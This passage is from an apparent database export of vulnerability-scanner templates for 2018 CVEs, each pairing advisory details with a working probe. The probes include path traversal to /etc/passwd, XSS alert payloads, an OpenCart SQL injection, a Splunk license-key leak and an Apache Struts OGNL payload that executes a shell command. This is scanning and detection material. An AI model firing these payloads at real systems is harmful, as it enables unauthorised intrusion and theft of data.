extractors:\n - type: regex\n name: file\n part: body_1\n internal: true\n group: 1\n regex:\n - '(.*?)\\|\\|\\|\\|'\n# digest: 4b0a00483046022100aab26195eec27b220d615f8c9e60fbab9ae457867d1c4209eb5ae8cacfb3ca18022100a4cb00aa3b61687473a5a2627c73a4958334b53104f383a1c2e6513d003484a1:922c64590222798bb761d5b6d8e72950", "hash": "377c2c6b3e414f2f94be7ad10082d649", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30802b" }, "name": "CVE-2018-10956.yaml", "content": "id: CVE-2018-10956\n\ninfo:\n name: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.\n remediation: |\n Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability.\n reference:\n - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/\n - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb\n - https://www.exploit-db.com/exploits/44916/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10956\n - https://github.com/xbl3/awesome-cve-poc_qazbnm456\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-10956\n cwe-id: CWE-22\n epss-score: 0.57917\n epss-percentile: 0.97652\n cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ipconfigure\n product: orchid_core_vms\n shodan-query: http.title:\"Orchid Core VMS\"\n tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: 
regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f4b3ba62ada360ed542a1dc3aeb23fe810a3516b33b87653ac8cc1e848028c5b0221009dcb0edfc90ad78d55ad83bcfc106071329ffdb8ca67a671481c79a10b2a61cc:922c64590222798bb761d5b6d8e72950", "hash": "2afe9a6f88b7e2362c7a0daaaf082b86", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30802c" }, "name": "CVE-2018-11227.yaml", "content": "id: CVE-2018-11227\n\ninfo:\n name: Monstra CMS <=3.0.4 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade Monstra CMS to a version higher than 3.0.4 or apply the official patch provided by the vendor.\n reference:\n - https://github.com/monstra-cms/monstra/issues/438\n - https://www.exploit-db.com/exploits/44646\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11227\n - https://github.com/monstra-cms/monstra/issues\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-11227\n cwe-id: CWE-79\n epss-score: 0.02135\n epss-percentile: 0.8903\n cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: monstra\n product: monstra_cms\n shodan-query: http.favicon.hash:419828698\n tags: cve,cve2018,xss,mostra,mostracms,cms,edb,monstra\n\nhttp:\n - raw:\n - |\n POST 
/admin/index.php?id=pages HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n login=\"><script>alert(document.domain)</script>&password=xxxxxx&login_submit=Log+In\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"><script>alert(document.domain)</script>\"\n - \"Monstra\"\n case-insensitive: true\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022074cd3bf33b0ec1ad4b73a00fa8f4cfde3b82a43929ed109dd58ad53b67201676022076a0f365907066a7d10d38ff9db65c72da72a1cf7dfce6c3a44502c6ae55bdcc:922c64590222798bb761d5b6d8e72950", "hash": "2e2143cde33e1eb662dd8abc5a475a4f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30802d" }, "name": "CVE-2018-11231.yaml", "content": "id: CVE-2018-11231\n\ninfo:\n name: Opencart Divido - Sql Injection\n author: ritikchaddha\n severity: high\n description: |\n OpenCart Divido plugin is susceptible to SQL injection\n impact: |\n This vulnerability can lead to data theft, unauthorized access, and potential compromise of the entire Opencart Divido system.\n remediation: |\n Apply the official patch or upgrade to a version that includes the fix.\n reference:\n - https://web.archive.org/web/20220331072310/http://foreversong.cn/archives/1183\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11231\n - http://foreversong.cn/archives/1183\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2018-11231\n cwe-id: CWE-89\n epss-score: 0.00903\n epss-percentile: 0.82368\n cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:*\n metadata:\n max-request: 1\n vendor: divido\n product: divido\n framework: opencart\n tags: cve,cve2018,opencart,sqli,intrusive,divido\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1\n Host: {{Hostname}}\n\n {\"metadata\":{\"order_id\":\"1 and 
updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)\"},\"status\":2}\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"{{md5({{num}})}}\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210094fdc034027036f675331a436c8d9717e75ce79fc7a19d05b65af74381436044022100f81d99821fdfe5caea01c0c541569fd07dd78ac1522bbf7146f0a3b802ac09e8:922c64590222798bb761d5b6d8e72950", "hash": "6cd55c040b2a052e355e388284fa2d2c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30802e" }, "name": "CVE-2018-11409.yaml", "content": "id: CVE-2018-11409\n\ninfo:\n name: Splunk <=7.0.1 - Information Disclosure\n author: harshbothra_\n severity: medium\n description: Splunk through 7.0.1 is susceptible to information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.\n remediation: |\n Upgrade Splunk to a version higher than 7.0.1 to mitigate the vulnerability.\n reference:\n - https://github.com/kofa2002/splunk\n - https://www.exploit-db.com/exploits/44865/\n - http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11409\n - http://www.securitytracker.com/id/1041148\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2018-11409\n cwe-id: CWE-200\n epss-score: 0.81162\n epss-percentile: 0.98059\n cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: splunk\n product: splunk\n tags: cve,cve2018,edb,splunk\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json'\n - '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json'\n\n matchers-condition: 
and\n matchers:\n - type: word\n words:\n - licenseKeys\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b713a4f66f9d5d0e0c1621cb4d7346a8391dfcb9840a579aaf892c3aa5d3b62102210084e5a59025b33e6a132de272f100fa98b4e5478c6ffc88166ad534afe06b9d7f:922c64590222798bb761d5b6d8e72950", "hash": "9786df5edf34493e11418913b6a3328e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30802f" }, "name": "CVE-2018-11473.yaml", "content": "id: CVE-2018-11473\n\ninfo:\n name: Monstra CMS 3.0.4 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the registration form (i.e., the login parameter to users/registration). An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/monstra-cms/monstra/issues/446\n - https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11473\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-11473\n cwe-id: CWE-79\n epss-score: 0.00097\n epss-percentile: 0.39534\n cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: monstra\n product: monstra\n shodan-query: http.favicon.hash:419828698\n tags: 
cve,cve2018,xss,mostra,mostracms,cms,monstra\n\nhttp:\n - raw:\n - |\n GET /users/registration HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /users/registration HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"><script>alert(document.domain)</script>\"\n - \"Monstra\"\n case-insensitive: true\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - 'id=\"csrf\" name=\"csrf\" value=\"(.*)\">'\n internal: true\n part: body\n# digest: 490a004630440220740d343390daffdaa2e4889d6c8f3c60262ea0f8dfefa267015b150d60eb9c46022072f2d72c1ca4e16ec3ce633cf0ad2ae4a154180871ea90d771a74a50410a9bfb:922c64590222798bb761d5b6d8e72950", "hash": "e9d7bb9eddbbd961f32345e5dc82fd9b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308030" }, "name": "CVE-2018-11709.yaml", "content": "id: CVE-2018-11709\n\ninfo:\n name: WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update the wpForo Forum plugin to version 1.4.12 or later (versions up to and including 1.4.11 are affected) or apply the vendor-provided patch to fix the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11709\n - https://wordpress.org/plugins/wpforo/#developers\n - https://wpvulndb.com/vulnerabilities/9090\n - 
https://blog.dewhurstsecurity.com/2018/06/01/wp-foro-wordpress-plugin-xss-vulnerability.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-11709\n cwe-id: CWE-79\n epss-score: 0.00175\n epss-percentile: 0.53725\n cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: gvectors\n product: wpforo_forum\n framework: wordpress\n tags: cve,cve2018,wordpress,xss,wp-plugin,gvectors\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"</script><script>alert(document.domain)</script>\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022020b9433d2689cd1c916656c6593704d52cdc82d3cae348cb23bbd6b903fa6e4102210093789a3005ae04750511962961e6ce2b78f9e2bdb3cd2d6871867fa439c29424:922c64590222798bb761d5b6d8e72950", "hash": "565fb33098b471c1542bbd61ec55cdb5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308031" }, "name": "CVE-2018-11759.yaml", "content": "id: CVE-2018-11759\n\ninfo:\n name: Apache Tomcat JK Connector <=1.2.44 - Manager Access\n author: harshbothra_\n severity: high\n description: |\n Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 allows specially constructed requests to expose application functionality through the reverse proxy. It is also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. 
While there is some overlap between this issue and CVE-2018-1323, they are not identical.\n impact: |\n Unauthenticated attackers can gain unauthorized access to the Apache Tomcat Manager interface, potentially leading to further compromise of the server.\n remediation: |\n Upgrade to a patched version of Apache Tomcat JK Connect (1.2.45 or higher) or apply the recommended security patches.\n reference:\n - https://github.com/immunIT/CVE-2018-11759\n - https://lists.apache.org/thread.html/6d564bb0ab73d6b3efdd1d6b1c075d1a2c84ecd84a4159d6122529ad@%3Cannounce.tomcat.apache.org%3E\n - https://lists.debian.org/debian-lts-announce/2018/12/msg00007.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11759\n - https://access.redhat.com/errata/RHSA-2019:0366\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-11759\n cwe-id: CWE-22\n epss-score: 0.96552\n epss-percentile: 0.99592\n cpe: cpe:2.3:a:apache:tomcat_jk_connector:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: tomcat_jk_connector\n shodan-query: title:\"Apache Tomcat\"\n tags: cve2018,cve,apache,tomcat,httpd,mod-jk\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/jkstatus'\n - '{{BaseURL}}/jkstatus;'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"JK Status Manager\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022041afb53374b858558cfa721e985551966ce7288cec93b493945ea139d7386f8402205f4e5b293d6960714f5f73b027b4e94ae9e1807296b861ed9b23392772a3be60:922c64590222798bb761d5b6d8e72950", "hash": "33bc9a10e73bfc9fd9bceb7612fbc2ff", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308032" }, "name": "CVE-2018-11776.yaml", "content": "id: CVE-2018-11776\n\ninfo:\n name: Apache Struts2 S2-057 - Remote Code Execution\n author: pikpikcu\n severity: high\n description: |\n Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution 
when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace.\n impact: |\n Remote code execution\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.\n reference:\n - https://github.com/jas502n/St2-057\n - https://cwiki.apache.org/confluence/display/WW/S2-057\n - https://security.netapp.com/advisory/ntap-20180822-0001/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11776\n - http://packetstormsecurity.com/files/172830/Apache-Struts-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2018-11776\n cwe-id: CWE-20\n epss-score: 0.97517\n epss-percentile: 0.99985\n cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve,cve2018,packetstorm,apache,rce,struts,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100ab1c51e0504628fe004acf4adeb03221ca6e19060ece841c357bd983b6d698760221009d5e783a014ec2025efc6cb4589970bba73805b98312143cd27a9ac719bdee2c:922c64590222798bb761d5b6d8e72950", "hash": "fb254dd74abb207ec6f60f5720033cb7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308033" }, "name": "CVE-2018-11784.yaml", "content": "id: CVE-2018-11784\n\ninfo:\n name: Apache Tomcat - Open Redirect\n author: geeknik\n severity: medium\n description: |\n Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because they fail to properly sanitize user-supplied input.\n impact: |\n An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware.\n remediation: |\n Upgrade to Apache Tomcat 9.0.12, 8.5.34 or 7.0.91 (or later on the respective release branch), or apply the relevant patch provided by the Apache Software Foundation.\n reference:\n - https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11784\n - http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00030.html\n - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00056.html\n - http://packetstormsecurity.com/files/163456/Apache-Tomcat-9.0.0M1-Open-Redirect.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\n cvss-score: 4.3\n cve-id: CVE-2018-11784\n cwe-id: CWE-601\n epss-score: 0.83718\n epss-percentile: 0.98183\n cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: tomcat\n shodan-query: title:\"Apache Tomcat\"\n tags: cve,cve2018,packetstorm,tomcat,redirect,apache\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}//interact.sh\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: header\n regex:\n - 
'(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n\n - type: status\n negative: true\n status:\n - 404\n# digest: 4a0a00473045022056187efc1263a71f2d8b32f9de3c5f204e1f0e14a74e5c6414adcc71e2baef0f022100c535f4d342896061392e41c1198b95e62d3934b01628ac2a8a8bfdd16547d8ed:922c64590222798bb761d5b6d8e72950", "hash": "3d07ee336df82361fc61055a07d95ee0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308034" }, "name": "CVE-2018-12031.yaml", "content": "id: CVE-2018-12031\n\ninfo:\n name: Eaton Intelligent Power Manager 1.6 - Directory Traversal\n author: daffainfo\n severity: critical\n description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of Eaton Intelligent Power Manager to mitigate this vulnerability.\n reference:\n - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion\n - https://www.exploit-db.com/exploits/48614\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12031\n - https://github.com/0xT11/CVE-POC\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-12031\n cwe-id: CWE-22\n epss-score: 0.00725\n epss-percentile: 0.80248\n cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: eaton\n product: intelligent_power_manager\n tags: cve,cve2018,edb,lfi,eaton\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd\"\n - \"{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"\\\\[(font|extension|file)s\\\\]\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ab34469cfcefff232919bd56d0ecb10087647817db9eba51fae678e7630e51e002202f79da64c606d1225444596f885702817709284e378c496818f3ee1144ce6188:922c64590222798bb761d5b6d8e72950", "hash": "671d6256ca4ec6a5e34b1ff97ef2f509", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308035" }, "name": "CVE-2018-12054.yaml", "content": "id: CVE-2018-12054\n\ninfo:\n name: Schools Alert Management Script - Arbitrary File Read\n author: wisnupramoedya\n severity: high\n description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive information stored on the system, potentially exposing personal data of students, staff, and other stakeholders.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the arbitrary file read vulnerability in the Schools Alert Management Script.\n reference:\n - https://www.exploit-db.com/exploits/44874\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12054\n - https://github.com/unh3x/just4cve/issues/4\n - https://www.exploit-db.com/exploits/44874/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-12054\n cwe-id: CWE-22\n epss-score: 0.36029\n epss-percentile: 0.9677\n cpe: 
cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: schools_alert_management_script_project\n product: schools_alert_management_script\n tags: cve,cve2018,lfi,edb,schools_alert_management_script_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/img.php?f=/./etc/./passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100909d49cf51c1283f77ba2b94390ec551a381726ad24bc74122062cdf6ef9d80d02206aa868f2e0d240bebc71f4ce6fca02e97592a2b0c377d466545fb0b3d1cb715d:922c64590222798bb761d5b6d8e72950", "hash": "69883489ffbd5a6dfc5852135e57c5ea", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308036" }, "name": "CVE-2018-1207.yaml", "content": "id: CVE-2018-1207\n\ninfo:\n name: Dell iDRAC7/8 Devices - Remote Code Injection\n author: dwisiswant0\n severity: critical\n description: |\n Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability\n which could be used to execute remote code. 
A remote unauthenticated attacker may\n potentially be able to use CGI variables to execute remote code.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.\n remediation: |\n Apply the latest firmware updates provided by Dell to mitigate this vulnerability.\n reference:\n - https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf\n - https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1207\n - http://en.community.dell.com/techcenter/extras/m/white_papers/20485410\n - https://twitter.com/nicowaisman/status/977279766792466432\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-1207\n cwe-id: CWE-94\n epss-score: 0.01875\n epss-percentile: 0.88144\n cpe: cpe:2.3:a:dell:emc_idrac7:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dell\n product: emc_idrac7\n tags: cve2018,cve,dell,injection,rce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/login?LD_DEBUG=files\"\n\n matchers:\n - type: word\n part: response\n words:\n - \"calling init: /lib/\"\n# digest: 4a0a00473045022100aecfe41ed529d979eb0d5e85bcb47766d58e166f2a3001bdd425be15bae9f33302204dbc7bef9234de5be6f16d334ac21107b1381db5dd0d893a75aeaf8a596b5b77:922c64590222798bb761d5b6d8e72950", "hash": "b86c2bafe114482b2648fcb97647b65f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308037" }, "name": "CVE-2018-12095.yaml", "content": "id: CVE-2018-12095\n\ninfo:\n name: OEcms 3.1 - Cross-Site Scripting\n author: LogicalHunter\n severity: medium\n description: OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's 
browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest patch or upgrade to a newer version of OEcms to fix the XSS vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/44895\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095\n - https://cxsecurity.com/issue/WLB-2018060092\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12095\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2018-12095\n cwe-id: CWE-79\n epss-score: 0.00333\n epss-percentile: 0.70604\n cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: oecms_project\n product: oecms\n tags: cve2018,cve,xss,edb,oecms_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206cbd123e860c5657ebdbbfa98574fb5663ab2209adc3b40b143af0bad366355e022100db1434e013133eadf65a81ddda4ff57c1d48bfdd5f490d4252d757ede09fd48d:922c64590222798bb761d5b6d8e72950", "hash": "f1538b2e5313c84b96ac815ba4dae84f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308038" }, "name": "CVE-2018-12296.yaml", "content": "id: CVE-2018-12296\n\ninfo:\n name: Seagate NAS OS 4.3.15.1 - Server Information Disclosure\n author: princechaddha\n severity: high\n description: Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos.\n impact: |\n An attacker can gain sensitive information about the server, potentially leading to further 
